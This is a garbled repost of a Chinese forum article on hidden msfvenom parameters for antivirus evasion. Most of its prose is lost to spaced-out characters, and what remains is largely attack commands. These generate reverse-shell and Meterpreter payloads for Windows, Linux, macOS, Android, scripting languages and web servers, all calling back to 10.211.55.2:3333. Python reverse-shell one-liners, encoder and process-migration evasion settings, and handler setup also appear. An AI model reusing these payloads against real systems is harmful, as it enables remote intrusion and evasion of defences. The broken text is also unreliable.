[26910] 2020-02-10_远控免杀专题文章(2)-msfvenom隐藏的参数

文档创建者:s7ckTeam
浏览次数:3
最后更新:2025-01-19
2020-02-10_远控免杀专题文章(2)-msfvenom隐藏的参数 ( 2 ) - m s f v e n o m M s 0 8 0 6 7   2 0 2 0 - 0 2 - 1 0 T i d e   1 ( 1 ) - c o b a l t s t r i k e p a y l o a d m s f v e n o m T i d e   . T i d e W e b / / A I ( 1 ) -
m s f v e n o m m s f v e n o m m s f p a y l o a d m s f e n c o d e 2 0 1 5 6 8 m s f p a y l o a d m s f e n c o d e m e t a s p l o i t - f r a m e w o r k m s f p a y l o a d m s f e n c o d e r m s f c l i m s f v e n o m 使 - p ,   p a y l o a d   <   p a y l o a d >   使 p a y l o a d ( ) 使 p a y l o a d , - l ,   l i s t   [ m o d u l e _ t y p e ]   .   :   p a y l o a d s ,   e n c o d e r s ,   n o p s ,   a l l - n ,   n o p s l e d   <   l e n g t h >   p a y l o a d N O P - f ,   f o r m a t   <   f o r m a t >     ( 使   h e l p - f o r m a t s   m s f ) - e ,   e n c o d e r   [ e n c o d e r ]   使 e n c o d e r , 使 - e - b r a w   p a y l o a d - a ,   a r c h   <   a r c h i t e c t u r e >   p a y l o a d x 8 6   |   x 6 4   |   x 8 6 _ 6 4 p l a t f o r m   <   p l a t f o r m >   p a y l o a d - s ,   s p a c e   <   l e n g t h >   - b ,   b a d - c h a r s   <   l i s t >   使   ' x 0 f ' ' x 0 0 ' ; - i ,   i t e r a t i o n s   <   c o u n t >   p a y l o a d - c ,   a d d - c o d e   <   p a t h >   w i n 3 2   s h e l l c o d e - x ,   t e m p l a t e   <   p a t h >   , p a y l o a d - k ,   k e e p   p a y l o a d p a y l o a d - o p t i o n s   p a y l o a d - o ,   o u t   <   p a t h >   p a y l o a d - v ,   v a r - n a m e   <   n a m e >   s h e l l e s t   p a y l o a d - h ,   h e l p   h e l p - f o r m a t s   m s f w i n d o w s / m e t e r p r e t e r / r e v e r s e _ t c p m s f v e n o m   - p   w i n d o w s / m e t e r p r e t e r / r e v e r s e _ t c p   - - l i s t - o p t i o n s
使 p a y l o a d s 使 m s f v e n o m   - - l i s t   p a y l o a d s m s f v e n o m   - - l i s t   e n c o d e r s
e n c o d e r 使 s e s s i o n s e s s i o n s e s s i o n s e s s i o n 退 退 h a n d l e r 使 , - j - z 使 J o b s m s f p a y l o a d 使 m s f v e n o m p a y l o a d 使 p a y l o a d 使 p a y l o a d c m d / p o w e r s h e l l _ b a s e 6 4 x 8 6 / s h i k a t a _ g a _ n a i x 8 6 / s h i k a t a _ g a _ n a i m s f v e n o m   - - l i s t p a y l o a d s ,   e n c o d e r s ,   n o p s ,   p l a t f o r m s ,   a r c h s ,   e n c r y p t ,   f o r m a t s m s f   e x p l o i t ( m u l t i / h a n d l e r )   >   s e t   E x i t O n S e s s i o n   f a l s e       / / s e e s i o n m s f 5   e x p l o i t ( m u l t i / h a n d l e r )   >   s e t   S e s s i o n C o m m u n i c a t i o n T i m e o u t   0     / / 5 3 0 0 , 0 m s f 5   e x p l o i t ( m u l t i / h a n d l e r )   >   s e t   S e s s i o n E x p i r a t i o n T i m e o u t   0   / / 6 0 4 8 0 0 , 0 m s f   e x p l o i t ( m u l t i / h a n d l e r )   >   e x p l o i t   - j   - z e x p l o i t   - j   - z j o b s   - K m s f 5   >   h a n d l e r   - H   1 0 . 2 1 1 . 5 5 . 2   - P   3 3 3 3   - p   w i n d o w s / m e t e r p r e t e r / r e v e r s e _ t c p m i g r a t e
s h e l l p a y l o a d 1 P r e p e n d M i g r a t e = t r u e     使 s v c h o s t . e x e 2 使 - p 使 使 - e 使 x 8 6 / s h i k a t a _ g a _ n a i 使 - f M S F e x e - o p a y l o a d . e x e 使 r e v e r s e _ h t t p s p a y l o a d 使 b y p a s s p a y l o a d : m s f s t a g e 使 r e v e r s e _ t c p _ r c 4 s t a g e e n c o d e r 便 r c 4 s y m a n t e c m e t e r p r e t e r p a y l o a d w i n d o w s w i n d o w s 3 2 / 6 4 p a y l o a d w i n d o w s / m e t e r p r e t e r / r e v e r s e _ t c p p a y l o a d 3 2 使 - a   x 8 6 6 4 p a y l o a d w i n d o w s / x 6 4 / m e t e r p r e t e r / r e v e r s e _ t c p L i n u x M a c m s f v e n o m   - p   w i n d o w s / m e t e r p r e t e r / r e v e r s e _ t c p   L H O S T = 1 0 . 2 1 1 . 5 5 . 2   L P O R T = 3 3 3 3   - e   x 8 6 / s h i k a t a _ g a _ n a i   - b   " x 0 0 "   - i   5   - a   x 8 6   - - p l a t f o r m   w i n   P r e p e n d M i g r a t e = t r u e   P r e p e n d M i g r a t e P r o c = s v c h o s t . e x e   - f   e x e   - o     s h e l l . e x e s h e l l . e x e s v c h o s t . e x e s v c h o s t . e x e s y s t e m 3 2 P r e p e n d M i g r a t e P r o c = s v c h o s t . e x e g r e e n - m m s f v e n o m   - p   w i n d o w s / m e t e r p r e t e r / r e v e r s e _ h t t p s   l h o s t = 1 0 . 2 1 1 . 5 5 . 2   l p o r t = 3 3 3 3   - f   c m s f   e x p l o i t ( m u l t i / h a n d l e r )   >   s e t   E n a b l e S t a g e E n c o d i n g   t r u e       / / 使 s t a g e E n a b l e S t a g e E n c o d i n g   = >   t r u e m s f   e x p l o i t ( m u l t i / h a n d l e r )   >   s e t   s t a g e e n c o d e r   x 8 6 / f n s t e n v _ m o v S t a g e e n c o d e r   = >   x 6 4 / x o r m s f   e x p l o i t ( m u l t i / h a n d l e r )   >   s e t   s t a g e e n c o d i n g f a l l b a c k   f a l s e s t a g e e n c o d i n g f a l l b a c k   = >   f a l s e m s f v e n o m   - p     w i n d o w s / m e t e r p r e t e r / r e v e r s e _ t c p _ r c 4     l h o s t = 1 0 . 2 1 1 . 5 5 . 2   l p o r t = 3 3 3 3   R C 4 P A S S W O R D = t i d e s e c     - f   c m s f v e n o m   - p   w i n d o w s / m e t e r p r e t e r / r e v e r s e _ t c p   L H O S T = 1 0 . 2 1 1 . 5 5 . 2   L P O R T = 3 3 3 3   - a   x 8 6   - - p l a t f o r m   W i n d o w s   - f   e x e   >   s h e l l . e x e m s f v e n o m   - p   w i n d o w s / x 6 4 / m e t e r p r e t e r / r e v e r s e _ t c p   L H O S T = 1 0 . 2 1 1 . 5 5 . 2   L P O R T = 3 3 3 3   - f   e x e   >   s h e l l . e x e m s f v e n o m   - p   l i n u x / x 8 6 / m e t e r p r e t e r / r e v e r s e _ t c p   L H O S T = 1 0 . 2 1 1 . 5 5 . 2   L P O R T = 3 3 3 3   - a   x 8 6   - - p l a t f o r m   L i n u x   - f   e l f   >   s h e l l . e l f m s f v e n o m   - p   o s x / x 8 6 / s h e l l _ r e v e r s e _ t c p   L H O S T = 1 0 . 2 1 1 . 5 5 . 2   L P O R T = 3 3 3 3   - a   x 8 6   - - p l a t f o r m   o s x   - f   m a c h o   >   s h e l l . m a c h o
A n d r o i d P o w e r s h e l l N e t c a t n c n c S h e l l c o d e L i n u x S h e l l c o d e W i n d o w s S h e l l c o d e M a c S h e l l c o d e P y t h o n s h e l l P y t h o n s h e l l B a s h P e r l L u a R u b y W e b m s f v e n o m   - a   d a l v i k   - p   a n d r o i d / m e t e r p r e t e r / r e v e r s e _ t c p   L H O S T = 1 0 . 2 1 1 . 5 5 . 2   L P O R T = 3 3 3 3   - f   r a w   >   s h e l l . a p k m s f v e n o m   - p   a n d r o i d / m e t e r p r e t e r / r e v e r s e _ t c p   L H O S T = 1 0 . 2 1 1 . 5 5 . 2   L P O R T = 3 3 3 3   R   >   t e s t . a p k m s f v e n o m   - a   x 8 6   - - p l a t f o r m   W i n d o w s   - p   w i n d o w s / p o w e r s h e l l _ r e v e r s e _ t c p   L H O S T = 1 0 . 2 1 1 . 5 5 . 2   L P O R T = 3 3 3 3   - e   c m d / p o w e r s h e l l _ b a s e 6 4   - i   3   - f   r a w   - o   s h e l l . p s 1 m s f v e n o m   - p   w i n d o w s / s h e l l _ h i d d e n _ b i n d _ t c p   L H O S T = 1 0 . 2 1 1 . 5 5 . 2   L P O R T = 3 3 3 3     - f   e x e >   1 . e x e m s f v e n o m   - p   w i n d o w s / s h e l l _ r e v e r s e _ t c p   L H O S T = 1 0 . 2 1 1 . 5 5 . 2   L P O R T = 3 3 3 3     - f   e x e >   1 . e x e m s f v e n o m   - p   l i n u x / x 8 6 / m e t e r p r e t e r / r e v e r s e _ t c p   L H O S T = 1 0 . 2 1 1 . 5 5 . 2   L P O R T = 3 3 3 3   - a   x 8 6   - - p l a t f o r m   W i n d o w s   - f   c m s f v e n o m   - p   w i n d o w s / m e t e r p r e t e r / r e v e r s e _ t c p   L H O S T = 1 0 . 2 1 1 . 5 5 . 2   L P O R T = 3 3 3 3   - a   x 8 6   - - p l a t f o r m   L i n u x   - f   c m s f v e n o m   - p   o s x / x 8 6 / s h e l l _ r e v e r s e _ t c p   L H O S T = 1 0 . 2 1 1 . 5 5 . 2   L P O R T = 3 3 3 3   - a   x 8 6   - - p l a t f o r m   o s x   - f   c m s f v e n o m   - p   c m d / u n i x / r e v e r s e _ p y t h o n   L H O S T = 1 0 . 2 1 1 . 5 5 . 2   L P O R T = 3 3 3 3   - f   r a w   >   s h e l l . p y m s f v e n o m   - a   p y t h o n   - p   p y t h o n / m e t e r p r e t e r / r e v e r s e _ t c p   L H O S T = 1 0 . 2 1 1 . 5 5 . 2   L P O R T = 3 3 3 3   - f   r a w   >   s h e l l . p y p y t h o n / p y t h o n 3   - c   ' i m p o r t   s o c k e t , s u b p r o c e s s , o s ; s = s o c k e t . s o c k e t ( s o c k e t . A F _ I N E T , s o c k e t . S O C K _ S T R E A M ) ; s . c o n n e c t ( ( " 1 0 . 2 1 1 . 5 5 . 2 " , 3 3 3 3 ) ) ; o s . d u p 2 ( s . f i l e n o ( ) , 0 ) ;   o s . d u p 2 ( s . f i l e n o ( ) , 1 ) ;   o s . d u p 2 ( s . f i l e n o ( ) , 2 ) ; p = s u b p r o c e s s . c a l l ( [ " / b i n / b a s h " , " - i " ] ) ; ' p y t h o n / p y t h o n 3   - c   " e x e c ( " i m p o r t   s o c k e t ,   s u b p r o c e s s ; s   =   s o c k e t . s o c k e t ( ) ; s . c o n n e c t ( ( " 1 0 . 2 1 1 . 5 5 . 2 " , 3 3 3 3 ) ) n w h i l e   1 :     p r o c   =   s u b p r o c e s s . P o p e n ( s . r e c v ( 1 0 2 4 ) ,   s h e l l = T r u e ,   s t d o u t = s u b p r o c e s s . P I P E ,   s t d e r r = s u b p r o c e s s . P I P E ,   s t d i n = s u b p r o c e s s . P I P E ) ; s . s e n d ( p r o c . s t d o u t . r e a d ( ) + p r o c . s t d e r r . r e a d ( ) ) " ) " m s f v e n o m   - p   c m d / u n i x / r e v e r s e _ b a s h   L H O S T = 1 0 . 2 1 1 . 5 5 . 2   L P O R T = 3 3 3 3   - f   r a w   >   s h e l l . s h m s f v e n o m   - p   c m d / u n i x / r e v e r s e _ p e r l   L H O S T = 1 0 . 2 1 1 . 5 5 . 2   L P O R T = 3 3 3 3   - f   r a w   >   s h e l l . p l m s f v e n o m   - p   c m d / u n i x / r e v e r s e _ l u a   L H O S T = 1 0 . 2 1 1 . 5 5 . 2   L P O R T = 3 3 3 3   - f   r a w   - o   s h e l l . l u a m s f v e n o m   - p   r u b y / s h e l l _ r e v e r s e _ t c p   L H O S T = 1 0 . 2 1 1 . 5 5 . 2   L P O R T = 3 3 3 3   - f   r a w   - o   s h e l l . r b
P H P A S P X A S P J S P W A R n o d e j s H a n d l e r s m s f v e n o m m s f v e n o m p a y l o a d e n c o d e r z s h m s f v e n o m m s f v e n o m 使 m s f v e n o m   - p   p h p / m e t e r p r e t e r _ r e v e r s e _ t c p   L H O S T = 1 0 . 2 1 1 . 5 5 . 2   L P O R T = 3 3 3 3   - f   r a w   >   s h e l l . p h p c a t   s h e l l . p h p   |   p b c o p y   & &   e c h o   ' < ? p h p   '   |   t r   - d   ' n '   >   s h e l l . p h p   & &   p b p a s t e   > >   s h e l l . p h p m s f v e n o m   - a   x 8 6   - - p l a t f o r m   w i n d o w s   - p   w i n d o w s / m e t e r p r e t e r / r e v e r s e _ t c p   L H O S T = 1 0 . 2 1 1 . 5 5 . 2   L P O R T = 3 3 3 3   - f   a s p x   - o   s h e l l . a s p x m s f v e n o m   - p   w i n d o w s / m e t e r p r e t e r / r e v e r s e _ t c p   L H O S T = 1 0 . 2 1 1 . 5 5 . 2   L P O R T = 3 3 3 3   - f   a s p   >   s h e l l . a s p m s f v e n o m   - p   j a v a / j s p _ s h e l l _ r e v e r s e _ t c p   L H O S T = 1 0 . 2 1 1 . 5 5 . 2   L P O R T = 3 3 3 3   - f   r a w   >   s h e l l . j s p m s f v e n o m   - p   j a v a / j s p _ s h e l l _ r e v e r s e _ t c p   L H O S T = 1 0 . 2 1 1 . 5 5 . 2   L P O R T = 3 3 3 3   - f   w a r   >   s h e l l . w a r m s f v e n o m   - p   n o d e j s / s h e l l _ r e v e r s e _ t c p   L H O S T = 1 0 . 2 1 1 . 5 5 . 2   L P O R T = 3 3 3 3   - f   r a w   - o   s h e l l . j s u s e   e x p l o i t / m u l t i / h a n d l e r s e t   P A Y L O A D   < P a y l o a d   n a m e > s e t   L H O S T   1 0 . 2 1 1 . 5 5 . 2 s e t   L P O R T   3 3 3 3 s e t   E x i t O n S e s s i o n   f a l s e e x p l o i t   - j   - z G r e e n _ m z s h #   m s f v e n o m   p l u g i n . g i t   c l o n e   h t t p s : / / g i t h u b . c o m / G r e e n - m / m s f v e n o m - z s h - c o m p l e t i o n   ~ / . o h - m y - z s h / c u s t o m / p l u g i n s / m s f v e n o m / #     ~ / . z s h r c   p l u g i n s = ( . . .     m s f v e n o m ) #   s h e l l . z s h r c s o u r c e   ~ / . z s h r c
m s f v e n o m   : h t t p s : / / k l i o n s e c . g i t h u b . i o / 2 0 1 7 / 0 3 / 0 8 / m s f v e n o m - a d v a n c e d / H o w   t o   u s e   m s f v e n o m : h t t p s : / / g i t h u b . c o m / r a p i d 7 / m e t a s p l o i t - f r a m e w o r k / w i k i / H o w - t o - u s e - m s f v e n o m m s f v e n o m   使 h t t p : / / w w w . o n e b u g . o r g / t e s t i n g / 1 6 1 . h t m l B y p a s s   A V   m e t e r p r e t e r : h t t p s : / / g r e e n - m . m e / 2 0 1 6 / 1 1 / 1 5 / m e t e r p r e t e r - b y p a s s - a v / M s 0 8 0 6 7 W e b P y t h o n J A V A C T F A P T w w w . m s 0 8 0 6 7 . c o m
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则